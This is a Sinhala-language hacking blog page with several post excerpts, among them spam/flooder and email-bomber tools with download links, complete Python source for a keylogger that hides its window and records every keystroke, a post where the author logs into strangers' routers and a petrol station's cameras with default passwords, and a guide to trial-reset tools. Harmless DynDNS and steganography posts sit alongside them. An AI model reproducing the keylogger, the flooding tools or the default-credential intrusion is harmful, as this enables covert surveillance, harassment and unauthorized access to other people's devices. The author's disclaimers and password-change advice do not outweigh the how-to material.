ඉල්ලගෙන කෑම සහ අල්ලගෙන මැරෙන්න නෙළිම - Hacking tools (Spammers/flooders) ; { Facebook Flooder & Marketing tools , Deluxe Chat Spam & E -mail Bomber}

12

Share/Bookmark
අද කියන්න යන්නේ නම් ටිකක් වෙනස් , අවුට් ඔෆ්ද ට්‍රැ‍රැක් ගනයේ ‍ටුල්ස් කිහිපයක් ගැන .අනේ ඕං මම මුලින්ම කියුවා , මේ මෘදුකාංග ගැන මම කියන්නේ දැනගැනිම පිණිස මිසක් අනුන්ට කරදරයක් කරන්න හිතාගෙන නෙවෙයි ඕං .hah

මම අද කියන්න යන මෘදුකාංග කිහිපයට අලුත්ම .Net Framework (v 3.5) එක ඕනේ කරනවා . මුලින්ම මම කියන්න යන්නේ Deluxe-tools.net වෙතින් භාගත කරගත හැකි ටූල්ස් කිහිපයක් ගැන . Deluxe-tools.net තිබෙන වැදගත් වෙයි කියලා හිතුණු ‍ටුල්ස් 2 ගැන මම පොඩි විඩියෝ කට්ටක් කලා . ඒක පහතින් බලන්නකෝ .




යොදාගත්ත ටූල්ස් 2 ක වෙන්නේ Deluxe Chat Spam , E-mail bomber . මම මෙහි Hitfaker එකත් ටෙස්ටින් පාරක් දුන්නා , ඒ වුනත් කනපැලෙන්න errors ගොඩයි (තාම Alpha version නේ තියන්නේ) .garupale
තව හොද හොද බඩුභාණ්ඩ තියනවා , ඒ පැත්තේ ගිහිල්ලම බලන්නකෝ !!!


http://deluxe-tools.net/downloads.php?cat_id=1

අනික් ‍ටුලස් 2 ක තමා Facebook Black Box Flooder සහ Facebook Blaster Pro (For E-mail Marketing) . Facebook Black Box Flooder හොදා කවුරුහරි නහරකාරයෙක්ව බය කරන්න Spam කරලා . අනික (Facebook Blaster Pro) හොද ඔය internet marketing කරන කට්ටියට .

Facebook Black Box එක ලියලා තියන්නේ .net වලින් පිලිපිනයේ හැකර් කෙනෙක් . ‍ටුල් එකේ source code එක බලන්න .NET Reflector (http://www.red-gate.com/products/reflector/) භාවිතා කරන්න පුලුවන් . මම මේක දැක්කේ නම් hackforums.net (Original thread : www.hackforums.net/showthread.php?tid=401867) එකේ (අපෝ මේකට එන අය දන්නවා ඇති ඔක්කොම බඩු භාණ්ඩ තියන්නේ මේකේ කියලා . අලුතෙන් මේකට එනවා නම් ලංකාවේ ip තහනම් කරලා තියන්නේ , proxy, tor එකක් හරි vpn එකක් හරි භාවිතා කරන්න වෙනවා වෙබ් අඩවියට යනවානම් ) . මටත් ඉතින් ඇම්ම කියන එක ඔක්කොටම වඩා තියන නිසා එන හැම භාණ්ඩයක්ම virtual pc එකක අනිවාර්්‍යයෙන්ම ටෙස්ටින් පාරක් දෙනවා නොවැ . garupale

Original thread : www.hackforums.net/showthread.php?tid=401867
Download : http://www.mediafire.com/?jmmynmakryi

Facebook Blaster Pro ගැන කියනවා නම් internet marketing කරන කට්ටියට කියපු කිරිටොයියා. මේකෙන් කරන්නේ නම් අපිට group , fan page එකක ඉන්න කට්ටියගේ id අරගෙන ඒ අයට message යවන්න , friend request යවන්න , එක පාරම අනිකයගේ wall වල මොනාහරි ලියන්න වගේ Internet marketing වලට සම්බන්ධ වැඩ කිඩ ස්වයංක්‍රියවම කරන එකතමා . ආ අනික තමා මේකේ browser එක ලෙස දැනට පාවිච්චි කල හැක්කේ "Internet Explorer 7.0 හෝ ඊට වැඩි" ඒවා තමා .

Download : http://facebookblaster.com/

මම මේ ගැනත් පොඩි විඩියෝ කට්ටක් කළා . ඒකත් බලලා මේ ගැන ඔයාලාගේ අදහස් කියලම යන්නකෝ පහළින් !!!! garupale

ඉතිරිය කියවන්න .....>>

බඩු පැකට් - Dynamic IP එකක් තියාගෙන තමන්ගේම Server එකක් run කිරිම .

3

Share/Bookmark
හප්පා හුඟකාලෙකට පස්සේ මේකට එන්න හම්බවුණේ . පහුගිය දවස් වල මට ඔලුවට ගහලා තිබුනේ Software Cracking යි , Cryptography නේ මේගැනත් පොඩි විඩියෝ ටිකක් කලා හිමිට ඒ ටිකත් දාන්නම්කෝ . මේ දවස්වල ඔලුවට ගහලා තියන්නේ Steganography , දැන් මට මාර කික් වෙලා තියන්නේ සිංදු ආපස්සට යවලා ඒවාවල තියන හැංගිච්ච පණිවිඩ හොයන එක hah . හපොයි වල්පල් ගිය දුර , කියන්න ගිය කාරණයත් අමතක වුණානේ .

අද මම කියන්න යන්නේ කොහොමද Dynamic IP Address එකක් තියාගෙන තමන්ගේම Server එකක් හදාගන්නේ රන් කරන්නේ කියලා . Dynamic Ip Address එකක් තියන විට අපිට තියන ලොකුම අවුල තමා IP Address එක සැරෙන් සැරේට වෙනස්විම . ඉතින් එතකොට අපිට තියන අවුල තමා , අපි Server Software එකක් මැසිමේ run කරනවා නම් අපි ip address එක වෙනස් කරන සැරයක් පාසා අපේ IP address එක DNS Servers වල එකපාරටම update නොවිම නිසා වෙන අයට අපේ Server එකට එන්න බැරි විම . මේක මඟහරවාගන්න තියන ක්‍රමය තමා DNS web hosting භාවිතය . මෙම සේවාව නොමිලේ දෙන තැනුත් තියනවා; අන්න ඒවගේ තැනක් තමා DyDNS කියන්නේ . මම DyDNS පාවිච්චි කරලා කොහොමද Dynamic Ip Address එකක් තියාගෙන අවුලක් නැතුව Sever Software එකක් තමන්ගේ මැසිමේ run කරන්නේ කියලා , පහත විඩියෝවේ පෙන්වලා තියනවා . විඩියෝව බලලම පහළින් මේක ගැන ඔයලාගේ අදහස් එහෙම දාලා යන්නකෝ !!!


Video Part 1








Video Part 2






අවශ්‍ය ලින්ක්ස් සහ මෘදුකාංග :

Dyndns :http://www.dyndns.com
Dyndns Updater : http://www.dyndns.com/support

Wamp Server : http://www.wampserver.com/en/

Port Forwarding : http://portforward.com/
ඉතිරිය කියවන්න .....>>

අරපිරිමැස්ම - Sonar වලින් කරන්ට් බිල අඩුකරගැනිම .

6

Share/Bookmark
අද කියන්න යන්නේ මැසිමේ නැති වෙලාවට ස්වයංක්‍රියවම sonar හරහා මැසිම නින්දට පත් කිරිමේ මහා විප්ලවකාරි පිලිවෙතක් ගැන .. නිතරම පරිඝණකය භාවිතා කරන අයට නම් කියපුම් මරු භාණ්ඩය hah , ඔය පහළ තියන විඩියෝ එකත් බලලා කොමෙන්ට් එකක් දාලම යන්නකෝ !!!



වැඩේට ඕනේ කරන බඩු භාණ්ඩ ටික :

http://stevetarzia.com/sonar/download.php
http://www.microsoft.com/express/Downloads
http://www.wxwidgets.org/downloads
http://www.portaudio.com/download.html

=======================================================================
අමතර :

මට ඉහත විඩියෝව හම්බවුණේ http://www.tinkernut.com/ එකෙන් , මෙම වෙබ් අඩවියේ මරු මරු tips , tricks තියනවා , ගිහිල්ලම බලන්නකෝ . හැබැයි විඩියෝ බලනවා නම් මම නම් කියන්නේ මෙයාගේ youtube channel (http://www.youtube.com/user/gigafide) එකට ගිහිල්ලා බලන එකම තමා හොඳ .


උදාහරණයක් විදිහට අලුතෙන්ම දාලා තියන steganography ( hiding messages in plain site) ගැන තියන විඩියෝ එකත් මරු .





භාවිතා කළ කළමනා ටික :

http://www.irongeek.com/i.php?page=security/ms-office-stego-code
http://sourceforge.net/projects/hide-in-picture/
http://www.irongeek.com/i.php?page=security/unicode-and-lsb-stego-code

=======================================================================
*මොකද හිතන්නේ මේ ගැන , ඔය පහළින් කොමෙන්ට් එකක් දාලම යන්නකෝ !!! garupale

ඉතිරිය කියවන්න .....>>

ඕපාදුප සෙවිම - keylogger එකක ක්‍රියාකරිත්වය

4

Share/Bookmark
අද මම කියන්න යන්නේ Keylogger එකක් කියන්නේ මොකක්ද හා එහි සරළ සැකසුමයි ? (මේකට පළමු විඩියෝව බලන්න) , ඊළඟට මගේ වීඩියෝ එක : Keylogger එකක ක්‍රියාකරිත්වය .gile

තමන්ට මෙම විඩියෝ වල අන්තර්ගතයන් අත්හදා බැලිමට අවශ්‍ය මෘදුකාංග සහ තොරතුරු පහතින් ලබාගන්න .garupale


Video 1




Keylogger Source code (pyton)
- Download Python: http://www.python.org/
- Download Pyhook: pyhook.sourceforge.net
- Download Python for Windows Extensions: http://sourceforge.net/projects/pywin32/
Source :



import win32api
import win32console
import win32gui

import pythoncom, pyHook

win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)

def OnKeyboardEvent(event):
if event.Ascii==5:
_exit(1)

if event.Ascii != 0 or 8:
f=open('c:\\output.txt','r')
buffer=f.read()
f.close()
f=open('c:\\output.txt','w')
keylogs=chr(event.Ascii)
if event.Ascii==13:
keylogs='/n'
buffer += keylogs
f.write(buffer)
f.close()

hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()


Video 2







ආ තව දෙයක් මේ සමහර (*මම පාවිච්චි කරපු) keyloggers virus guard වලින් virus කියලා අල්ලනවා . ඒක නිසා මම පාවිච්චි කරපු keyloggers වල link මම දෙන්න යන්නේ නෑ (මොනාහරි වැරදුනොත් එහෙම මගේ ඔලුව කන්න එයි !! tension) , ඔයාලට ඕනෙම නම් Deep freeze දාලා හරි , වෙනම Virtual PC එකක් හරි දාලා keyloggers ටික ජංජාලයෙන් හොයාගෙන දාගන්න පුලුවන් .

* මම පාවිච්චි කරපු keyloggers 2 ක තමා General Keylogger v 1.0 සහ Vicspy Keylogger 2008 .

*මොකද හිතන්නේ මේ ගැන , ඔය පහළින් කොමෙන්ට් එකක් දාලම යන්නකෝ !!! garupale
ඉතිරිය කියවන්න .....>>

හැකර්ලව හැක් කිරිම - Phishing scam මෘදුකාංග හැක් (*crack) කිරිම

4

Share/Bookmark
අද නම් කියන්න යන්නේ මහා අමුතු දෙයක් නම් නෙවෙයි , ඔය ගොඩක් ජංජාලයේ facebook hacker , gmail hacker , yahoo hacker කියලා තියන මෘදුකාංග තනිකරම scam / virus මෘදුකාංග . අපිට ඔය කියන facebook , gmail , yahoo වැනි වෙබ් අඩවි හිතුමතේට හැක් කරන්න බෑ , එම වෙබ් අඩවි වල සිටින Security experts ලා එහි ඇති Vulnerabilities (දෝෂ) අදුනාගෙන ඒවාට නිසි patch යොදා තිබෙනවා . එම නිසා අපට හිතුමතේට එම වෙබ් අඩවි වල database එකට ගිහිල්ලා අවශ්‍ය තොරතුරු ගන්න බෑ . මෙම වෙබ් අඩවි වල දෝෂ තිබිය හැක්කේ කලාතුරකින් (කලාතුරකින් කියන්නත් බෑ) වන අතර මෙම දෝෂ හඳුනාගැනිමට එක මෘදුකාංගයකින් කල නොහැකි අතර ඒ සඳහා නිසි දැනුමක්ද අවශ්‍ය වේ . garupale

ලංකාවේ උන්ට නම් ඉතින් කොච්චර කට කැඩෙන කම් කියුවත් අහන්නේ නෑනේ (සමහර මී හරක්ට) , මේ මී හරක් ‍රැලට කට කැඩෙන කන් කියලත් , මේ මෘදුකාංග දාලා බලලා කෙල වෙනකම්ම නින්ද යන්නේ නැ නෝවැ ........ garupale

පහත විඩියෝ 2 කම බලන්නකෝ , ඕකේ මම ඔය කියන scam මෘදුකාංගයක් හදලා ඕක crack කරලා පෙන්නනවා (* මෘදුකාංග හැක් කරන්න බෑ , crack කරනවා මිසක් !!! garupale ).


මම අන්තිමට දෙන අවවාදය නම් Phishing scam මෘදුකාංග භාවිතා නොකරන්න Yahoo, Facebook, Gamil හැක් කරන්න .




Part 1







Part 2






අවශ්‍ය මෘදුකාංග සහ තොරතුරු :
Mail SMTP settings : http://www.emailaddressmanager.com/tips/mail-settings.html

decomplier : http://reflector.red-gate.com/Download.aspx

Hex Workshop : http://www.hexworkshop.com/

*මොකද හිතන්නේ මේ ගැන , ඔය පහළින් කොමෙන්ට් එකක් දාලම යන්නකෝ !!! garupale
ඉතිරිය කියවන්න .....>>

මෘදුකාංගයක කාලය හොරකම් කිරිම - Trial Resetter එකක් හරහා trial මෘදුකාංගයක් දිගටම පාවිච්චි කිරිම .

2
  • May 6, 2010
  • C0de BlUe
  • Labels:

  • Share/Bookmark

    අද ලියන්න යන්නේ නම් ටිකක් විතර වැදගත් වෙයි කියලා හිතන මෘදුකාංගයක් ගැන. ගොඩක් අය මේක ගැන දන්නවාත් ඇති , නමුත් යාළුවෝ සෙට් එක මේක ගැන පොඩ්ඩක් ලියන්න කියුව හින්දම ඕං මම ලිව්වා garupale . *// මේ දවස් වල මට මාර දාඩියක් දාන්නේ , ඉන්න බෑ , ටික වෙලාවක් ගියාට පස්සේ දාඩිය වේලුනාම එන හම් එක නම් මට පට්ට ආතල් hah!! //*. අද කියන්න යන මෘදුකාංග ගැන කියනාවා නම් මෙව්වට කියන්නේ Trial resetters කියලා , ආං දැන් මතක් උනානේ (*මෙය ගැන දන්න අයට) hah. මෙම මෘදුකාංගය ගැන කියනවානම් මෙයින් කරන්නේ මොකක්හරි trial මෘදුකාංගයක trial period එක දික් කිරිම , ඒ කියන්නේ trial මෘදුකාංගයක trial period එක ගෙවි ගියද එය නැවත reset කර නැවත trial period එක ලබාගෙන පාවිච්චි කිරිම ( උදා : හිතන්න මම දින 30 ක trial period එකක් තියන මෘදුකාංගයක් මැයි 1 වෙනිදා install කලා කියලා, ඊට පස්සේ මම මෙම මෘදුකාංගය මැයි 29 වෙනිදට Trial resetters එකක් හරහා run කරලා තව දින 30 ක් මේ Trial මෘදුකාගයට ලබාදෙනවා , එතකොට මට මේ Trial මෘදුකාගය ජුනි 28 වෙනකම් අවුලක් නැතුව පාවිච්චි කරන්න පුලුවන්) එලනේ !!! hah

    ජංජාලයේ නම් ඕනේ තරම් මෙවැනි මෘදුකාංග තියනවා , මම කියන්නම් මට අල්ලලා ගිය මෙවැනි මෘදුකාංග 2 ක් ගැන .

    1. Time Stopper


    * භාගත කරගන්න මෙතැන කොටන්න .


    2. RunAsDAte



    * භාගත කරගන්න මෙතැන කොටන්න .


    මේවායේ ක්‍රියාකරිත්වය ගැන කියුවොත් නම් මෘදුකාංග ඔක්කොම වගේ ක්‍රියාකරන්නේ එකම විදිහට නිසා මම මේ මෘදුකාංග 2 කේ ක්‍රියාකරිත්වය වෙන වෙනම කියන්න යන්නේ නෑ , ඔක්කොම එකම සැරේ කියලා දාන්නම්කෝ . ඒකට ඉතින් පහත විඩියෝ එක බලන්නකෝ !!! bising



    *මෙතැනදි මතක තබාගතයුතු මුලික කරුණු වනුයේ Trial Resetter හි අදාල දිනය ‍තෝරනකොට එම දිනය trial period එකේ කාලපරිච්ඡේදයට අදාල දිනයක් ‍තෝරන්න (දින 30 ක trial program එකක් නම් ඉදිරි දිනයකට වෙනස් කරනකොට එම දිනය වෙනස් කරන දිනයේ සිට දවස් 30ක් ඇතුලත දිනයක් වන බවට වගබලාගත යුතුයි ) . උදා : හිතන්න මම දින 30 ක trial period එකක් තියන මෘදුකාංගයක් මැයි 1 වෙනිදා install කලා කියලා (දින 30ක් කියනේ මැයි 1 දා සිට මැයි 31 දක්වා), ඊට පස්සේ මම මෙම මෘදුකාංගය මැයි 16 වෙනිදට Trial resetter එක හරහා run කරනවා කියලා , එතැනදි මම අදාල දිනය (trial resetter හි ‍තෝරන දිනය) ලෙස මැයි 1 වෙනිදා දුන්නා කියලා හිතන්නකෝ. එතකොට මට තව දින 15 ක් (මැයි 1 සිට මැයි 16 ට දින 15 කි) වැඩිපුර ලැබෙනවා. එතකොට මගේ trial Software එක expire වන්නේ ජුනි 15 යි ( මැයි 16 සිට මැයි 31 දක්වා තිබෙන දින 15 + වැඩිපුර දින 15 ක් = දින 30 ) ; දැන් මම මේකේ (trial restter හි) ‍තෝරන දිනය ලෙස අප්රේනල් 29 ට තේරුවොත් මට දින 17 ක් ලැබෙනවා ( අප්රේ ල් 29 සිට මැයි 16 දක්වා) , එතකොට මට වැඩිපුර දින 2 ක් ලැබිලා , මගේ trial Software එක expire වන්නේ ජුනි 17 යි ( මැයි 16 සිට මැයි 31 දක්වා තිබෙන දින 15 + වැඩිපුර දින 17 = දින 32 ), trial period එක දින 30 ක් නිසා මෙලෙස දැමු විට මෙම හැක්කිරිල්ල ක්රිදයානොරනු ඇත . දෙවෙනි කරුණ නම් shortcut එකක් අපි සෑදු පසු අනෙක් shortcuts (මෘදුකාංගය install කිරිමේදි ලැබෙන shortcuts සියල්ලම) මකා දැමිය යුතුය . මන්දයත් ඒවා මඟින් මෘදුකාංගය open කර run කලොත් මෙම හැක්කිරිල්ල නැතිවන නිසාය .


    *මොකද හිතන්නේ මේ ගැන , ඔය පහළින් කොමෙන්ට් එකක් දාලම යන්නකෝ !!! garupale
    ඉතිරිය කියවන්න .....>>

    ඉල්ලන් කෑම - modem / router හැක් කිරිල්ල ....

    5

    Share/Bookmark
    හප්පේ මට නම් අද රජ සැප වගේ ,මොකද කියන්න අද තමා අල වෙච්ච ජංජාලය අවුලක් නැතුව ෆුල් පර්ෆෝමන්ස් ආවේ garupale. අද මම පොඩි ගේම් කට්ටක් delphi වලින් ලිය ලිය ඉන්න කොට බයිස්කොප් සිංහලෙන් වෙබ් අඩවියේ හැකර්ස් බයිස්කොප් එක ගැන අහන්න ලැබුණා (ඇන්ත්‍රැක්ස් අයියට බොහෝම පිං ඔත්තුව දුන්නට), ඊටපස්සේ කලේ හැකර්ස් බයිස්කොප් 3 න භාගෙන දැන ආතල් එකේ බලනවා , ඕක බල බල ජංජාලය නිකන් තියන්න බැරි නිසා ඊයේ කරපු පොඩි විඩියෝ කට්ටක් youtube එකට upload වෙන්න දාලා බ්ලොග් පොස්ට් එකකුත් ලියන්න හිතුවා.......garupale .

    අද නම් මහා ලොකු හැකින් අනම් මනම් නෑ , කලේ පොඩි වැඩ කෑල්ලක් දාලා කරපු මගෝඩියක් , මුලින්ම කියන්න ඕනේ මම මේක කරන්න මුලිකවම හේතුවුනේ මගේ යාලුවෙක් මුහුණදුන්න සිද්ධියක් හේතුකොටගෙනය . අපේ ඔය අන්තර්ජාලය පාවිච්චි කරන උදවිය කරන බොහෝම බරපතල වරදක් තමා router / modem එකක් ගෙනාවට පස්සේ එහි default එන username එකයි password එකයි වෙනස් නොකරම සිට , අන්තර්ජාලය පරිහණය කිරිම . ගොඩක් අය නම් ඕක නොසැලකිල්ල / නොදැනුවත්කම නිසා නොකර ඉන්නවා , නමුත් සමහරුන්ට නම් කට කැඩෙන කම් කිව්වත් අහන්නේ නෑ hah, පස්සේ කෙල උනාම තමා මෙතැන අඬන්න පටන්ගන්නේ (මේක වුණු මගේ යාළුවත් ඔය වගේ එකෙක් තමා !) . පහත විඩියෝ 2 බලන්නකෝ ; මම ඔතැනදි මගේ ip address එක ඇතුලත් ip range එකක් අරගෙන , ඒ ip range එකේ online තියන පරිඝනක වල router / modem වලට default එන username එකයි password යොදාගෙන log වෙලා පෙන්නවා (බලන්නකෝ අපේ අයගේ සැලකිලිමත්කම ගැන garupale ) , තව අනිවා 2 විඩියෝ එක බලන්න , ඕකේ පෙට්‍රල් ෂෙඩ් එකක කැමරාවලටත් මම වැඩේ දෙනවා බලන්නකෝ soal ; හපොයි ඕක මට අහූඋන නිසා අවුලක් නෑ , වෙන එකෙකුට අහු උනානම් මොන තොවිලයක් නටයිද දන්න්නේ නෑ (මම වුනත් ඔය ටික තම කරන්නේ , විඩියෝ එක record කරන නිසා මුකුත් කලේ නෑ soal .) .

    " ඒක නිසා මම අන්තිමට ක්යන්නේ router / modem එකක් ගෙනාවට පස්සේ එහි default එන username එකයි password එකයි අනිවාර්්‍යයෙන්ම වෙනස් කරන්න. !!"



    * ඔයාලා ඉතින් මේ ලිපිය ගැන මොකද හිතන්නේ , ඔය විඩියෝ 2 කත් බලලා කොමෙන්ට් එකක් දාලම යන්නකෝ !! garupale


    Part 1




    Part 2




    Software : Acunetix Web Vulnerability Scanner

    වැඩිපුර Default router / modem පාස්වර්ඩ් ටිකක් :

    http://www.pcwintech.com/default-router-modem-passwords
    http://www.phenoelit-us.org/dpl/dpl.html
    http://www.cirt.net/passwords
    ඉතිරිය කියවන්න .....>>
    Related Posts with Thumbnails